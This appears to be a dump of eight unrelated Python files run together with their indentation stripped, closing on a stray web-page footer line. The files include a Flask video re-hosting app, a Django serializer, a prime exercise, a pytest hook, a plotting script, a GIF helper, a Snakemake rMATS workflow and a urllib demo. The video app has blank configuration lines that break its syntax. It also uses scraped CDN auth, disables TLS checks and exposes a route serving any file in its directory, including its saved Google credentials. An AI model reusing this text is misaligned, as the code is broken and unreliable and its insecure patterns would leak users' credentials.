def uploadAPI(filename,policy,signature,file):
data = MultipartEncoder({"filename":filename,"signature":signature,"filedata":(file,open(file,"rb"),"video/mp4"),"policy":policy})
#postdata = {"filename":filename,"signature":signature,"filedata":open(file,"rb"),"policy":policy}
header = {"Content-Type":data.content_type,"Content-Length":"0","User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36"}
response = requests.post("https://mps.lotuscdn.vn/_/upload",headers=header,data=data,verify=False)
print(response.json())
return response.json()
def kinghubFileInfo(filepath,api_key,auth_key,sessionid):
header={"Authorization":"Bearer "+auth_key,"session-id":sessionid,"API-Authorization":api_key}
response = requests.get("https://webpub.lotuscdn.vn/api/webkinghub/kinghub-fileinfo?filename="+filepath,headers=header,verify=False)
print(response.json())
return response.json()
def get_random_string(length=10):
letters_and_digits = string.ascii_lowercase + string.digits
result_str = ''.join((random.choice(letters_and_digits) for i in range(length)))
return result_str
def upload(file):
try:
filename = generateFilename(file)
auth = lotusAuth(filename)
filename = auth["filename"]
policy = auth["policy"]
signature = auth["signature"]
sessionid = auth["sessionid"]
api_key = auth["api_key"]
auth_key = auth["auth_key"]
upload_details = uploadAPI(filename,policy,signature,file)
#time.sleep(2)
#video_info = kinghubFileInfo(upload_details["file_path"],api_key,auth_key,sessionid)
return upload_details
except:
return None
def fetchFileInfo(file_path):
try:
auth = lotusAuthFileInfo()
sessionid = auth["sessionid"]
api_key = auth["api_key"]
auth_key = auth["auth_key"]
video_info = kinghubFileInfo(file_path,api_key,auth_key,sessionid)
return video_info
except:
return None
def lotusAuthFileInfo():
auth_key = gtk()["auth_key"]
user_data = getUserInfo()
sessionid = user_data["sessionid"]
user_id = user_data["user_id"]
api_key = getToken(auth_key,sessionid,user_id)["access_token"]
return {"sessionid":sessionid,"api_key":api_key,"auth_key":auth_key}
def getid(link):
id = link.replace("https://drive.google.com","").replace("/file/d/","").replace("open?id=","").replace("/view","").replace("/edit","").replace("?usp=sharing","")
return id
def create_credential():
from GoogleAuthV1 import auth_and_save_credential
auth_and_save_credential()
# Authentication + token creation
def create_drive_manager():
gAuth = GoogleAuth()
typeOfAuth = None
if not path.exists("credentials.txt"):
typeOfAuth = input("type save if you want to keep a credential file, else type nothing")
bool = True if typeOfAuth == "save" or path.exists("credentials.txt") else False
authorize_from_credential(gAuth, bool)
drive: GoogleDrive = GoogleDrive(gAuth)
return drive
def authorize_from_credential(gAuth, isSaved):
if not isSaved: #no credential.txt wanted
from GoogleAuthV1 import auth_no_save
auth_no_save(gAuth)
if isSaved and not path.exists("credentials.txt"):
create_credential()
gAuth.LoadCredentialsFile("credentials.txt")
if isSaved and gAuth.access_token_expired:
gAuth.LoadCredentialsFile("credentials.txt")
gAuth.Refresh()
print("token refreshed!")
gAuth.SaveCredentialsFile("credentials.txt")
gAuth.Authorize()
print("authorized access to google drive API!")
def download(fileid): #downloader
while True:
try:
file = driver.CreateFile({"id":fileid})
file.GetContentFile(fileid)
if os.stat(fileid).st_size == file["size"]:
return(fileid)
else:
if os.path.isfile(fileid):
os.remove(fileid)
continue
except:
if os.path.isfile(fileid):
os.remove(fileid)
return None
def MediaToBaseDownloader(fileid):
file = driver.CreateFile({"id":fileid})
local_fd = open(fileid,"wb")
request = driver.auth.service.files().get_media(fileId=fileid)
media_request = http.MediaIoBaseDownload(local_fd, request)
while True:
try:
download_progress, done = media_request.next_chunk()
except errors.HttpError as error:
print ('An error occurred: %s' % error)
return None
if download_progress:
print ('Download Progress: %d%%' % int(download_progress.progress() * 100))
if done:
print ('Download Complete')
return fileid
def generate(link):
if link == None:
return None
s = link.replace("https://drive.google.com","").replace("/file/d/","").replace("open?id=","").replace("/view","").replace("/edit","").replace("?usp=sharing","").replace(" ","").replace("\n","")
drive = s[::-1]
cdn = "https://lotus.animetvn.com/stream?id="+drive
return cdn+"\n"
main = Flask(__name__) #setup vaariables
main.config["MONGO_URI"] =
main.config["CELERY_RESULT_BACKEND"] =
main.config["CELERY_BROKER_URL"]="amqp://localhost//"
main.config["SECRET_KEY"] =
method_requests_mapping = {
'GET': requests.get,
'HEAD': requests.head,
'POST': requests.post,
'PUT': requests.put,
'DELETE': requests.delete,
'PATCH': requests.patch,
'OPTIONS': requests.options,
}
#inits
celery = make_celery(main)
mongo = PyMongo()
mongo.init_app(main)
video_db = mongo.db.lotus
user_collection = mongo.db.users
driver=create_drive_manager()
@celery.task(name="api") #celery implementation for queueing
def celeryapi(fileid):
try:
path = MediaToBaseDownloader(fileid)
if path:
lotus = upload(path)
if lotus:
os.remove(path)
myquery ={"drive":str(fileid)}
newvalues = { "$set": lotus}
video_db.update_one(myquery,newvalues)
file = driver.CreateFile({"id":fileid})
newvalues = { "$set": {"title":file["title"],"ts":str(time.time())}}
video_db.update_one(myquery,newvalues)
return "Done"
else:
if os.path.isfile(fileid):
os.remove(fileid)
video_db.delete_one({"drive":fileid})
return "Unsuccessful"
else:
if os.path.isfile(fileid):
os.remove(fileid)
video_db.delete_one({"drive":fileid})
return "Unsuccessful"
except:
if os.path.isfile(fileid):
os.remove(fileid)
video_db.delete_one({"drive":fileid})
return "Unsuccessful"
@main.route("/api") #main engine
def lotus():
video_db = mongo.db.lotus
user_collection = mongo.db.users
if request.args:
args = request.args
fileid = args.get("drive").replace("https://drive.google.com","").replace("/file/d/","").replace("open?id=","").replace("/view","").replace("/edit","").replace("?usp=sharing","")
key = args.get("key")
check = video_db.find_one({"drive":str(fileid)})
if check:
encrypt =str(check["_id"])
if 'info' in check.keys() or "file_path" in check.keys():
dict ={"status":"done","embed": "https://lotus.animetvn.com/?id="+str(encrypt)}
else:
dict ={"status":"processing","embed": "https://lotus.animetvn.com/?id="+str(encrypt)}
return json.dumps(dict)
else:
try:
video_db.insert_one({'drive' : str(fileid),"key":key})
encrypt = video_db.find_one({"drive":str(fileid)})["_id"]
celeryapi.delay(fileid)
dict ={"status":"processing","embed": "https://lotus.animetvn.com/?id="+str(encrypt)}
return json.dumps(dict)
except:
return json.dumps({"status":"unavailable"}),404
else:
return json.dumps({"status":"unavailable"}),404
@main.route("/")
def stream():
video_db = mongo.db.lotus
if request.args:
args = request.args
drive= args.get("id")
query = video_db.find_one({"_id":ObjectId(drive)})
if query:
if "info" in query.keys():
if args.get("hls"):
return render_template("lotus.html",playlist = query["info"]["full_path"]+"/master.m3u8",thumbnail=query["info"]["thumbnail"],title=query["title"])
return render_template("lotus.html",playlist = query["info"]["full_path"],thumbnail=query["info"]["thumbnail"],title=query["title"])
if "file_path" in query.keys():
if "ts" in query.keys():
if (float(query["ts"])+float(3600)) < time.time():
return render_template("lotus.html",playlist = "https://web.lotuscdn.vn"+query["file_path"]+"/master.m3u8",title=query["title"])
else:
return render_template("lotus.html",playlist = "https://web.lotuscdn.vn"+query["file_path"],title=query["title"])
else:
return render_template("lotus.html",playlist = "https://web.lotuscdn.vn"+query["file_path"]+"/master.m3u8",title=query["title"])
else:
return json.dumps({"status":"processing"})
else:
return json.dumps({"status":"unavailable"}),404
else:
return json.dumps({"status":"unavailable"}),404
@main.route("/metadata")
def info():
video_db = mongo.db.lotus
if request.args:
args = request.args
drive= args.get("id")
query = video_db.find_one({"_id":ObjectId(drive)})
if query:
if "info" in query.keys():
return json.dumps(fetchFileInfo(query["info"]["file_path"]))
if "file_path" in query.keys():
return json.dumps(fetchFileInfo(query["file_path"]))
else:
return json.dumps({"status":"processing"})
else:
return json.dumps({"status":"unavailable"}),404
else:
return json.dumps({"status":"unavailable"}),404
@main.route("/<path:path>")
def files(path):
return send_from_directory("./",path)
def download_file(streamable):
with streamable as stream:
stream.raise_for_status()
for chunk in stream.iter_content(chunk_size=100000):
yield chunk
def _proxy(request,requestsurl):
resp = requests.request(method=request.method,url=requestsurl,headers={key: value for (key, value) in request.headers if key != 'Host'},data=request.get_data(), cookies=request.cookies,allow_redirects=False,stream=True)
headers = [(name, value) for (name, value) in resp.raw.headers.items()]
return Response(download_file(resp), resp.status_code, headers)
if __name__ == "__main__":
main.run(debug=True,port=8000)
|
from apps.team.models import Team, UserTeamAssignment
from rest_framework import serializers
from api.api_auth.serializers import UserSerializer
class UserTeamAssignment(serializers.ModelSerializer):
user = UserSerializer()
class Meta:
model = UserTeamAssignment
exclude = ['id', 'team']
class TeamSerializer(serializers.ModelSerializer):
members = serializers.SerializerMethodField()
class Meta:
model = Team
fields = "__all__"
def get_members(self, obj):
utas = obj.userteamassignment_set.all()
serializer_data = UserTeamAssignment(utas, many=True).data
return serializer_data
|
def es_primo(num):
for n in range(2, num):
if num % n == 0:
return False
return True
n = int(input())
i = 0
sw = True
j = 2
a = 1
cntS = 2
while i < n:
if es_primo(j):
if sw:
print(a,'/',j,sep='')
sw = False
else:
print(j,'/',a,sep='')
sw = True
a = a + cntS
cntS = cntS +1
i= i+1
j = j + 1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import py
ASYNC_DIR = py.path.local(os.path.abspath(__file__)).dirpath("async")
def pytest_ignore_collect(path, config):
# Ignore async tests if not supported.
if sys.version_info < (3, 6) and path.common(ASYNC_DIR) == ASYNC_DIR:
return True
|
"""
Student ID: 2594 4800
Name: JiaHui (Jeffrey) Lu
Aug-2017
"""
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(-10, 10, 0.01)
y = x * (1 + np.power(np.tan(x), 2)) / np.tan(x)
y1 = np.tan(x)
plt.subplot(1, 2, 1)
plot1, = plt.plot(x, y, label="condition")
plot2, = plt.plot(x, y1, "g", label="function")
plt.title("f(x) = tan(x)")
plt.legend(handles=[plot1, plot2], loc=1)
plt.ylim((-100, 100))
plt.subplot(1, 2, 2)
z = x / ((1 + np.power(x, 2)) * np.arctan(x))
z1 = np.arctan(x)
plot3, = plt.plot(x, z, label="condition")
plot4, = plt.plot(x, z1, "g", label="function")
plt.legend(handles=[plot3, plot4], loc=1)
plt.title("f(x) = arctan(x)")
plt.show()
"""
The green plot shows the function value and the blue plot shows the condition number.
As you can see, the condition number for arctan(x) behaves much nicer (much better conditioned) than tan(x)
""" |
"""Methods and constants for creating animations"""
# Standard Library
from typing import List
from random import choice, sample
# Third party
import gif
import numpy as np
import plotly.graph_objects as go
# TODO: add more colors
COLORS = [("#155b92", "#15925e"),
("#9b76bc", "#618da7"),
("#ffba08", "#ff8c61"),
("#ffba08", "#43aa8b"),
("#ff928b", "#b392ac"),
("#00d59e", "#ab63fa")]
@gif.frame
def animation_frame(fig: go.Figure) -> go.Figure:
return fig
def make_plot(state: np.ndarray, colors: List[str]) -> go.Figure:
height, width = state.shape
fig = go.Figure(go.Heatmap(z=state, colorscale=colors))
fig.update_traces(showscale=False)
fig.update_layout(width=10*width,
height=10*height,
xaxis_visible=False,
yaxis_visible=False,
margin=dict(t=0, b=0, l=0, r=0))
return fig
def make_animation(states: List[np.ndarray], filename: str):
print("animating...")
colors = sample(choice(COLORS), k=2)
frames = [animation_frame(make_plot(s, colors)) for s in states]
filename += f"_{len(frames)}_frames.gif"
gif.save(frames, filename, duration=75)
|
# -*- coding: utf-8
"""
Created on 17:07 27/07/2018
Snakemake workflow for rMATS
If you use rMATs, please cite
Shen, Shihao, et al. "rMATS: robust and flexible detection of differential
alternative splicing from replicate RNA-Seq data." Proceedings of the
National Academy of Sciences 111.51 (2014): E5593-E5601.
"""
__author__ = "Thiago Britto Borges"
__copyright__ = "Copyright 2021, Dieterichlab"
__email__ = "Thiago.BrittoBorges@uni-heidelberg.de"
__license__ = "MIT"
from collections import defaultdict
import tempfile
container: "docker://tbrittoborges/rmats:latest"
workdir: config.get("path", ".")
contrasts = config["contrasts"]
keys = config["samples"].keys()
keys = [tuple(x.split("_")) for x in keys]
temp_dir = tempfile.TemporaryDirectory()
d = defaultdict(list)
for x in keys:
d[x[0]].append(x[1])
include: "symlink.smk"
localrules:
create_rmats_input,
rule all:
input:
expand("rmats/{group}.txt", group=d.keys()),
expand("rmats/{contrast}/", contrast=contrasts),
rule rmats_create_input:
input:
lambda wc: expand("mappings/{{group}}_{rep}.bam", rep=d.get(wc.group)),
log:
"logs/rmats/create_input_{group}.log",
output:
"rmats/{group}.txt",
run:
with open(str(output), "w") as fou:
fou.write(",".join(input))
rule rmats_run:
input:
alt="rmats/{alt}.txt",
ref="rmats/{ref}.txt",
output:
directory("rmats/{alt}-vs-{ref}/"),
shadow:
"shallow"
log:
"logs/rmats/run_{alt}-vs-{ref}.log",
threads: 10
params:
gtf=config["ref"],
is_paired="single" if config.get("is_single_end") else "paired",
lib=config.get("strandness", "fr-unstranded"),
read_len=config["read_len"],
allow_clipping=config.get("rmats_allow_clipping", "--allow-clipping"),
variable_read_length=config.get(
"rmats_variable_read_length", "--variable-read-length"
),
novel_ss=config.get("rmats_novel_ss", "--novelSS"),
extra=config.get("rmats_extra", ""),
tmp=os.path.join(temp_dir.name, "{alt}_vs_{ref}/"),
shell:
"rmats.py "
"--b1 {input.alt} "
"--b2 {input.ref} "
"--gtf {params.gtf} "
"--readLength {params.read_len} "
"--nthread {threads} "
"-t {params.is_paired} "
"--libType {params.lib} "
"{params.novel_ss} "
"{params.allow_clipping} "
"{params.variable_read_length} "
"--od {output} "
"--tmp {params.tmp} "
"{params.extra}"
|
"""
created by ldolin
"""
import urllib.request
# https://httpbin.org/get 测试请求头
url = 'http://httpbin.org/get'
# response = urllib.request.urlopen(url)
# text = response.read().decode('utf-8')
# print(text)
# {
# "args": {},
# "headers": {
# "Accept-Encoding": "identity",
# "Host": "httpbin.org",
# "User-Agent": "Python-urllib/3.7"
# },
# "origin": "111.47.249.64, 111.47.249.64",
# "url": "https://httpbin.org/get"
# }
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'}
request = urllib.request.Request(url, headers=headers)
response = urllib.request.urlopen(request)
text = response.read().decode('utf-8')
print(text)
# {
# "args": {},
# "headers": {
# "Accept-Encoding": "identity",
# "Host": "httpbin.org",
# "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
# },
# "origin": "111.47.249.64, 111.47.249.64",
# "url": "https://httpbin.org/get"
# }
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.